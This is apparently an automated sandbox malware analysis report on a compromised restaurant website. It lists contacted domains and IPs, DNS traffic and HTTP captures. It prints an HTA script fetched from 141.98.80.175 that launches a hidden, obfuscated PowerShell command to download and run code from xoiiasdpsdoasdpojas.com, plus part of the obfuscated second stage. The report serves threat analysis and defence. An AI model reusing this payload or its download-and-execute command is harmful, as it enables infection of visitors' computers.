https://www.cloudflare.com/ru-ru/website-terms/	chromecache_203.1.dr	false	high
https://greensock.com/standard-license	chromecache_198.1.dr	false	high
https://schema.org/WPHeader	chromecache_189.1.dr	false	high
https://thefatshallot.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1	chromecache_189.1.dr	true	unknown
https://www.youtube.com/embed/ZmAIZd098o8	chromecache_189.1.dr	false	high
https://www.youtube-nocookie.com/embed/$4	chromecache_168.1.dr	false	high
https://thefatshallot.com/wp-admin/admin-ajax.php	chromecache_189.1.dr	true	unknown
https://russiaeu.ru/	chromecache_189.1.dr	false	unknown
https://thefatshallot.com/wp-content/uploads/2018/06/fatshallottruck.png	chromecache_189.1.dr	true	unknown
https://github.com/js-cookie/js-cookie	chromecache_189.1.dr	false	high
https://thefatshallot.com/wp-content/uploads/2023/02/fat-shallot-merchandise-mart.png	chromecache_189.1.dr	true	unknown
http://xoiiasdpsdoasdpojas.com/p	powershell.exe, 00000016.00000002.1990241947.0000021C44B8A000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://thefatshallot.com/#website	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/wp-content/uploads/2023/02/fat-shallot-merchandise-mart-274x300.png	chromecache_189.1.dr	true	unknown
http://141.0x62.80.175/rtdx.dat	mshta.exe, 00000015.00000002.1974671308.0000021CAE5D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000002.1973367618.00000214A7A1E000.00000004.00000020.00020000.00000000.sdmp, chromecache_203.1.dr	true	unknown
https://tdsworkout.com/js	chromecache_189.1.dr	false	unknown
https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/750146d79df2f7e02b6895527d982b4de952ab9	chromecache_148.1.dr	false	unknown
https://use.typekit.net	chromecache_158.1.dr	false	high
https://www.cloudflare.com/privacypolicy/	chromecache_155.1.dr, chromecache_203.1.dr	false	high
https://yoast.com/wordpress/plugins/seo/	chromecache_189.1.dr	false	high
https://ads.bravvoks.com/3a049e5/postback?subid=$	chromecache_203.1.dr	false	unknown
https://thefatshallot.com/comments/feed/	chromecache_189.1.dr	true	unknown
http://www.gimp.org/xmp/	chromecache_164.1.dr, chromecache_176.1.dr	false	high
http://141.98.80.175/rtdx.dat...r	mshta.exe, 00000015.00000003.1941804849.00000214A7A83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000002.1973546647.00000214A7A9B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/1389676a4641ef8e3b4790cf06063249d411a69	chromecache_148.1.dr	false	unknown
https://thefatshallot.com/page/aviator-oyununun-xususiyyatlari/index.html	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/gillson-beach-menu/	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/wp-content/themes/jupiter/assets/images/pre_code.gif	chromecache_189.1.dr	true	unknown
http://api.jquery.com/jQuery.browser	chromecache_167.1.dr	false	high
http://www.instagram.com/thefatshallot	chromecache_189.1.dr	false	high
http://141.98.80.1	mshta.exe, 00000015.00000003.1946884279.00000214A7AFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000003.1963409158.00000214A7AFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000003.1941804849.00000214A7AFB000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://thefatshallot.com/wp-content/uploads/2018/04/revival.jpeg	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/pre-hire-application/	chromecache_189.1.dr	true	unknown
http://141.98.80.175/rtdx.dat;	mshta.exe, 00000015.00000002.1973367618.00000214A7A1E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://thefatshallot.com/wp-content/uploads/2018/04/revival-736x414.jpeg	chromecache_189.1.dr	true	unknown
https://gettrumpmemes.gettrumpmemestrendingtokens.com/images/ca03486f14ec38cd5ed6377fe6f56c1a5713a44	chromecache_148.1.dr	false	unknown
https://thefatshallot.com/page/big-bass-splash-slot-mechanics/index.html	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/wp-content/uploads/2025/04/fat-shallot-gillson-beach-menu-spring-2025.pdf	chromecache_189.1.dr	true	unknown
http://xoiiasdpsdoasdpojas.com)2$	powershell.exe, 00000016.00000002.1989629313.0000021C41FB5000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://schema.org/WebPage	chromecache_189.1.dr	false	high
https://thefatshallot.com/wp-content/uploads/2025/04/fat-shallot-lincoln-park-spring-2025.pdf	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/wp-content/plugins/jupiter-donut/assets/js/shortcodes-scripts.min.js?ver=1	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/wp-json/	chromecache_189.1.dr	true	unknown
http://141.98.80.175/rtdx.dat...%	mshta.exe, 00000015.00000003.1941804849.00000214A7A83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000002.1973546647.00000214A7A9B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://thefatshallot.com/page/aviator-game-player-benefits/index.html	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/wp-content/plugins/js_composer_theme/assets/js/dist/js_composer_front.min.	chromecache_189.1.dr	true	unknown
https://getbootstrap.com/)	chromecache_173.1.dr	false	high
http://www.github.com/mattbryson	chromecache_198.1.dr	false	high
https://img.youtube.com/vi/$4/hqdefault.jpg	chromecache_168.1.dr	false	high
https://getfix.win/jsrepo?rnd=	chromecache_189.1.dr	false	unknown
http://www.insertmarketinghere.com/story/	chromecache_189.1.dr	false	unknown
https://goo.gl/OGw5Gm	chromecache_168.1.dr	false	high
https://api.flickr.com/services/rest/?format=json&method=	chromecache_205.1.dr	false	high
https://thefatshallot.com/page/fortune-gems-jili-games-slot-review/index.html	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthefatshallot.com%2F	chromecache_189.1.dr	true	unknown
https://thefatshallot.com/wp-content/uploads/2013/03/logo.png	chromecache_189.1.dr	true	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
141.98.80.175	xoiiasdpsdoasdpojas.com	Panama	43350	NFORCENL	false
172.66.172.247	whos.amung.us	United States	13335	CLOUDFLARENETUS	false
104.18.13.146	cdn.tynt.com.cdn.cloudflare.net	United States	13335	CLOUDFLARENETUS	false
178.16.53.137	getfix.win	Germany	40999	DUSNET-ASDE	false
67.202.105.32	ic.tynt.com	United States	32748	STEADFASTUS	false
67.202.105.31	de.tynt.com	United States	32748	STEADFASTUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
172.67.149.76	2no.co	United States	13335	CLOUDFLARENETUS	false
172.67.70.180	t.dtscout.com	United States	13335	CLOUDFLARENETUS	false
104.26.12.205	unknown	United States	13335	CLOUDFLARENETUS	false
193.24.211.233	xpoalswwkjddsljsy.com	Germany	12586	ASGHOSTNETDE	false
94.154.35.152	cptchdm.icu	Ukraine	49505	SELECTELRU	false
142.250.178.228	www.google.com	United States	15169	GOOGLEUS	false
103.136.68.61	tdsworkout.com	Bangladesh	30938	ABSTATIONwwwabstationnetGB	false
192.124.249.3	thefatshallot.com	United States	30148	SUCURI-SECUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.3.6
192.168.3.5
192.168.3.2

General Information

Joe Sandbox version:	43.0.0 Green Sapphire
Analysis ID:	4991369
Start date and time:	2025-10-17 08:51:01 +02:00
Joe Sandbox product:	Cloud
Overall analysis duration:	0h 5m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://thefatshallot.com/
Analysis system description:	Windows 10x64 22H2 (Office Professional Plus 2019, Chrome 134, Firefox 122, Adobe Reader 23, Java 8 Update 401, 7-Zip 23.01)
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.phis.evad.win@24/145@48/19

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 172.217.168.67, 74.125.133.84, 142.250.178.234, 142.250.178.195, 142.250.178.202, 172.217.168.74, 142.250.178.227, 142.250.178.238, 142.250.178.206, 172.217.168.78, 23.212.222.21, 20.190.177.22
Excluded domains from analysis (whitelisted): fp.msedge.net, clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, login.live.com, th.bing.com, update.googleapis.com, clients.l.google.com, browser.pipe.aria.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:52:56	API Interceptor	13x Sleep call for process: powershell.exe modified

Process:	C:\Windows\System32\mshta.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	336
Entropy (8bit):	4.952588605108225
Encrypted:	false
SSDEEP:	6:q43taYOXHmgEqrhamt3FRVXFCK0V9DFiwMch0MWXfGb:Twt9Eqr8mt1PXFCK0V9MwMCL8Gb
MD5:	5DA9EF1D500B1FAF9CBEE246D6ECFF27
SHA1:	3BFEBB65AE0C5770DE07083F9B2AD3684CA60E88
SHA-256:	FF14B28408121EBE4A5D0C2F14B9DC99E987E89B56392DC214481197D4815456
SHA-512:	2353B3242454FBAA39657585D0B66C979898579DCE856B6147D7FFB569B6E57E45132A91D924DF622BFF109981FC21D3C463B6C499093C03DEE2B92D7AE06C1B
Malicious:	false
Reputation:	low
Preview:	<html>..<head>.. <script language="JScript">.. window.onload = function () {.. var shell = new ActiveXObject("WScript.Shell");.... var cmd = 'POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)"';.... shell.Exec(cmd);.... window.close();.. };.. </script>..</head>..<body>..</body>..</html>

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1108
Entropy (8bit):	5.282506297376267
Encrypted:	false
SSDEEP:	24:3poMPRSwo4Kbs4RPT6Bm3jK3o+m9qr9t7J0gt/NKEij:5oMPRSd4P4RQmT/+m9qr9tK8Nza
MD5:	4CA6F835D1C6769EECBD6DB0FB911173
SHA1:	FEF7B6AC35F290F4783EB416111643559E686109
SHA-256:	6C2EFF0061259A7B26F7013EED3C1CAB6F50C88CF4247B70B78AC4C225D4377B
SHA-512:	821D948D16E4F764C777F2AA394EAD6DDFC32B30E71B71C934E899DBDE787B77C8DA3B3BD9936553FCED687AD09434EEFB12FDAB8CBBA12FE668411BC1FC3980
Malicious:	false
Reputation:	low
Preview:	@...e................................................@..........8..................1...L..U;V.<}........System.Numerics.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0.................Vn.F..kLsw..........System..4................:ts.h.K...JfBW.........System.Core.D...............E...y.BG.\..............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..<...............i..VdqF...\|...........System.Configuration4...............&.QiA0aN.:... .G........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4491), with no line terminators
Category:	downloaded
Size (bytes):	4491
Entropy (8bit):	5.444516855272375
Encrypted:	false
SSDEEP:	96:XJjxqR7SZ1HtBkO6td7UwCpVtLp0AefWdOjfnOgM:XBxuSZ1HtX8ddCpVtSViL
MD5:	D72E8ED6BE2AEF8CA1428A13A809B8AF
SHA1:	6AF5F2D783C1D5C9A27AF7E5048E31B36FF2652E
SHA-256:	BE56BDBD9AE4B55618BED899E24706E7529DB86C5743EFB9D26D66FF42B68888
SHA-512:	744993C91BD5011D3A6B40490D6E5746636388AA3FA51170A8425BF1482D186DBFD7455661CAFF1B2DCFE0B297E294AACE6A41116D678CE6CA9449E40551AD6C
Malicious:	false
Reputation:	low
URL:	https://xpoalswwkjddsljsy.com/js/dist.js
Preview:	(()=>{"use strict";var t=Math.PI;function n(t,n,r,e){void 0===e&&(e=!1);var o=n[0],a=n[1],i=r[0],c=r[1],s=i+(t-o)/(a-o)(c-i);if(!0===e)if(i<c){if(s<i)return i;if(s>c)return c}else{if(s>i)return i;if(s<c)return c}return s}function r(t,n,r,e,o){var a=Math.sin(o),i=Math.cos(o),c=t-r,s=n-e;return[ci-sa+r,ca+si+e]}function e(t,n,r,e){return Math.hypot(e-n,r-t)}function o(t,n,r,e){return Math.atan2(e-n,r-t)}function a(t,n,r,e){return[Math.cos(r)e+t,Math.sin(r)e+n]}function i(t,n,r,e,o){return void 0===o&&(o=.5),[t+(r-t)o,n+(e-n)o]}function c(n,r){return void 0===r&&(r=8),Math.floor(r(.5+n/(2t)%r))}function s(t,s,u,f,l){void 0===l&&(l={});var h=l,d=h.bow,v=void 0===d?0:d,y=h.stretch,w=void 0===y?.5:y,M=h.stretchMin,m=void 0===M?0:M,p=h.stretchMax,g=void 0===p?420:p,x=h.padStart,b=void 0===x?0:x,I=h.padEnd,A=void 0===I?0:I,P=h.flip,X=void 0!==P&&P,k=h.straights,E=void 0===k\|\|k,S=o(t,s,u,f),j=e(t,s,u,f),B=function(t,n,r,e){return Math.abs((r-t)/2/((e-n)/2))}(t,s,u,f);if(j<2(b+A)\|\|0=

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 17, 2025 08:51:33.925864935 CEST	53	52740	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:33.956871033 CEST	53	50149	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:34.217473030 CEST	53	49176	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:34.345740080 CEST	56460	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:34.346295118 CEST	59123	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:34.378318071 CEST	53	59123	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:34.383936882 CEST	53	56460	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:35.626235962 CEST	65185	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:35.627151012 CEST	64031	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:35.647145033 CEST	53	64031	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:35.649249077 CEST	53	64162	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:35.652266026 CEST	53	65185	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:36.644946098 CEST	57124	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:36.645112991 CEST	50791	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:36.685615063 CEST	53	57124	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:36.706348896 CEST	53	50791	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:37.927735090 CEST	64017	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:37.927905083 CEST	52966	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:37.946018934 CEST	53	64017	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:37.947933912 CEST	53	52966	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:38.270308971 CEST	56468	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:38.270804882 CEST	51550	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:38.271833897 CEST	51834	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:38.272105932 CEST	56370	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:38.332901001 CEST	53	51550	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:38.333159924 CEST	53	56468	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:38.525217056 CEST	55753	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:38.525630951 CEST	54367	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:38.535217047 CEST	52314	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:38.535424948 CEST	57462	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:38.544429064 CEST	53	54367	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:38.544905901 CEST	53	56370	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:38.545250893 CEST	56653	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:38.545830011 CEST	53	55753	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:38.553932905 CEST	53	57462	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:38.555953979 CEST	53	52314	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:38.571270943 CEST	53	56653	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:38.770709991 CEST	53	51834	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:39.322721004 CEST	51394	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:39.323189974 CEST	60130	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:39.357934952 CEST	53	51394	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:39.363559008 CEST	53	60130	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:39.673316956 CEST	49961	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:39.673616886 CEST	49736	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:39.895437002 CEST	53	64033	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:40.129657984 CEST	53	49961	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:40.140108109 CEST	53	49736	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:41.062966108 CEST	53	53000	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:41.456955910 CEST	65132	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:41.457145929 CEST	53133	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:41.457833052 CEST	53234	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:41.457978964 CEST	51756	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:41.459960938 CEST	58803	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:41.460123062 CEST	51005	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:41.476373911 CEST	53	53133	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:41.479983091 CEST	53	58803	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:41.482666016 CEST	53	51005	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:41.483006954 CEST	53	65132	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:41.483402014 CEST	53	53234	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:41.483513117 CEST	53	51756	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:41.726353884 CEST	52984	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:41.726640940 CEST	51074	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:41.745243073 CEST	53	52984	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:41.747050047 CEST	53	51074	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:41.933244944 CEST	59566	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:41.933510065 CEST	51118	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:41.953387976 CEST	53	59566	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:41.959094048 CEST	53	51118	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:42.126791000 CEST	54722	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:42.126943111 CEST	52119	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:42.145487070 CEST	53	52119	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:42.145564079 CEST	53	54722	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:42.146035910 CEST	59943	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:42.166317940 CEST	51359	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:42.166505098 CEST	62525	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:42.166600943 CEST	53	59943	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:42.169908047 CEST	54053	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:42.170088053 CEST	57519	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:42.185475111 CEST	53	51359	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:42.188725948 CEST	53	57519	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:42.190242052 CEST	53	54053	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:42.192672014 CEST	53	62525	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:42.210211992 CEST	52382	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:42.210371971 CEST	57430	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:42.228351116 CEST	53	57430	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:42.228364944 CEST	53	52382	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:42.368257999 CEST	58073	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:42.368684053 CEST	49671	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:51:42.388766050 CEST	53	58073	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:42.394882917 CEST	53	49671	1.1.1.1	192.168.3.5
Oct 17, 2025 08:51:51.634779930 CEST	53	52304	1.1.1.1	192.168.3.5
Oct 17, 2025 08:52:10.387109995 CEST	53	49339	1.1.1.1	192.168.3.5
Oct 17, 2025 08:52:33.210357904 CEST	53	56465	1.1.1.1	192.168.3.5
Oct 17, 2025 08:52:33.274941921 CEST	53	53661	1.1.1.1	192.168.3.5
Oct 17, 2025 08:52:36.430067062 CEST	57250	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:52:36.430284023 CEST	65290	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:52:36.448733091 CEST	53	65290	1.1.1.1	192.168.3.5
Oct 17, 2025 08:52:36.455650091 CEST	53	57250	1.1.1.1	192.168.3.5
Oct 17, 2025 08:52:43.054758072 CEST	138	138	192.168.3.5	192.168.3.255
Oct 17, 2025 08:52:57.173733950 CEST	56060	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:52:57.672262907 CEST	53	56060	1.1.1.1	192.168.3.5
Oct 17, 2025 08:53:03.356622934 CEST	53	50335	1.1.1.1	192.168.3.5
Oct 17, 2025 08:53:18.445219994 CEST	49898	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:53:18.954509020 CEST	53	49898	1.1.1.1	192.168.3.5
Oct 17, 2025 08:53:50.091180086 CEST	53	60159	1.1.1.1	192.168.3.5
Oct 17, 2025 08:54:05.147414923 CEST	49482	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:54:05.404573917 CEST	53	49482	1.1.1.1	192.168.3.5
Oct 17, 2025 08:54:27.456660986 CEST	56509	53	192.168.3.5	1.1.1.1
Oct 17, 2025 08:54:27.714085102 CEST	53	56509	1.1.1.1	192.168.3.5

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Oct 17, 2025 08:51:36.706425905 CEST	192.168.3.5	1.1.1.1	c31e	(Port unreachable)	Destination Unreachable
Oct 17, 2025 08:51:42.166678905 CEST	192.168.3.5	1.1.1.1	c2e5	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
Oct 17, 2025 08:52:53.076874971 CEST	325	OUT	GET /rtdx.dat HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 141.98.80.175 Connection: Keep-Alive
Oct 17, 2025 08:52:53.106992960 CEST	596	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:52:53 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 09 Oct 2025 21:57:36 GMT ETag: "150-640c0e3972f79" Accept-Ranges: bytes Content-Length: 336 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 76 61 72 20 73 68 65 6c 6c 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 76 61 72 20 63 6d 64 20 3d 20 27 50 4f 57 45 52 73 48 65 4c 6c 20 2f 77 20 68 20 2f 63 20 22 69 65 78 20 28 69 77 22 72 22 20 68 74 22 74 70 3a 2f 22 2f 78 6f 69 69 61 73 22 64 70 73 64 22 6f 61 73 22 64 70 22 6f 22 6a 61 22 73 2e 63 6f 6d 29 22 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 73 68 65 6c 6c 2e 45 78 65 63 28 63 6d 64 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 63 6c 6f 73 65 28 29 3b 0d 0a 20 20 20 20 7d 3b 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head> <script language="JScript"> window.onload = function () { var shell = new ActiveXObject("WScript.Shell"); var cmd = 'POWERsHeLl /w h /c "iex (iw"r" ht"tp:/"/xoiias"dpsd"oas"dp"o"ja"s.com)"'; shell.Exec(cmd); window.close(); }; </script></head><body></body></html>

Timestamp	Bytes transferred	Direction	Data
Oct 17, 2025 08:52:57.715987921 CEST	168	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031 Host: xoiiasdpsdoasdpojas.com Connection: Keep-Alive
Oct 17, 2025 08:52:57.746145010 CEST	1358	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:52:57 GMT Server: Apache/2.4.52 (Ubuntu) Vary: User-Agent Last-Modified: Tue, 14 Oct 2025 08:24:33 GMT ETag: "67cc59-6411a1d1c76bc" Accept-Ranges: bytes Content-Length: 6802521 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 0d 0a 66 75 6e 63 74 69 6f 6e 20 77 58 64 5a 63 79 53 4d 6e 5a 52 41 69 71 4c 20 7b 0d 0a 0d 0a 20 20 20 20 66 6f 72 65 61 63 68 20 28 24 73 52 69 68 5a 72 74 52 53 79 70 51 4e 56 71 20 69 6e 20 31 2e 2e 32 29 20 7b 20 24 6c 7a 62 49 4d 62 5a 62 6a 68 6a 49 44 7a 43 20 3d 20 38 34 37 3b 20 53 74 61 72 74 2d 53 6c 65 65 70 20 2d 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 20 31 20 7d 0d 0a 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 4f 4e 72 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 74 65 6d 70 56 61 72 20 3d 20 22 4b 45 58 6a 78 22 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 24 74 65 6d 70 56 61 72 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 54 6a 44 4b 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 74 65 6d 70 56 61 72 20 3d 20 22 72 51 6c 65 54 22 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 24 74 65 6d 70 56 61 72 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 24 58 53 48 61 45 68 6d 41 6d 4e 6f 4c 4c 6b 49 20 3d 20 32 37 38 20 23 20 52 61 6e 64 6f 6d 20 61 73 73 69 [TRUNCATED] Data Ascii: function wXdZcySMnZRAiqL { foreach ($sRihZrtRSypQNVq in 1..2) { $lzbIMbZbjhjIDzC = 847; Start-Sleep 